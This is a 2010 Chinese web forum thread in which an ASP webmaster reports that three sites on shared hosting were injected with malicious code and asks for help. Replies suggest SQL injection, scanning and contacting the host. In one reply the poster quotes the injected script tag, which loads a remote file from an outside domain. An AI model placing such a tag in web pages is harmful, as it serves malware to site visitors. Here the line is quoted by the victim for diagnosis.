郁闷啊,几个网站同时被人挂马!!!

uchiha2007 2010-11-20 09:29:56
网站是ASP开发的,三个网站都放在同一台买的虚拟主机上。三个网站都同时被挂马,我现在不清楚是我的网站自身的漏洞导致被挂马?还是服务器被挂马,牵连到我的网站了?

漏洞的话我自己又查不出来是哪里的漏洞,本人是菜鸟一个,有没有高人帮忙检测一下?
另外如果是服务器被挂马,应该怎么办?(由于是买的虚拟主机,对服务器没有控制权)
...全文
87 8 打赏 收藏 转发到动态 举报
写回复
用AI写文章
8 条回复
切换为时间正序
请发表友善的回复…
发表回复
Ghostbaby 2010-11-22
  • 打赏
  • 举报
回复
前提是你的网站没有漏洞 如果有漏洞 先补漏洞再说
Ghostbaby 2010-11-22
  • 打赏
  • 举报
回复
你都没有服务器的控制权 怎么杀

很有可能是跟你在一个物理服务器的其他虚拟空间中毒了

渗透到你网站的 找空间提供商
check_D 2010-11-21
  • 打赏
  • 举报
回复
先把嵌入的代码清除
qq305227174 2010-11-20
  • 打赏
  • 举报
回复
请教高手!!加QQ164829745
zhijie284 2010-11-20
  • 打赏
  • 举报
回复
自己不会检测一下吗?八成是sql注入漏洞……

找一些扫描工具查查,其实很简单的
我是一道光_ 2010-11-20
  • 打赏
  • 举报
回复
.....


俗话说,建个网站容易,维护好了难。

没有相关经验
uchiha2007 2010-11-20
  • 打赏
  • 举报
回复
另外说一下:
这次被挂马是.asp,.htm文件的页头和页尾被插入了下面的代码

<script src=http://photo.hcnk120.com/images/1.gif></script>

9,506

社区成员

发帖
与我相关
我的任务
社区描述
Windows专区 安全技术/病毒
社区管理员
  • 安全技术/病毒社区
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧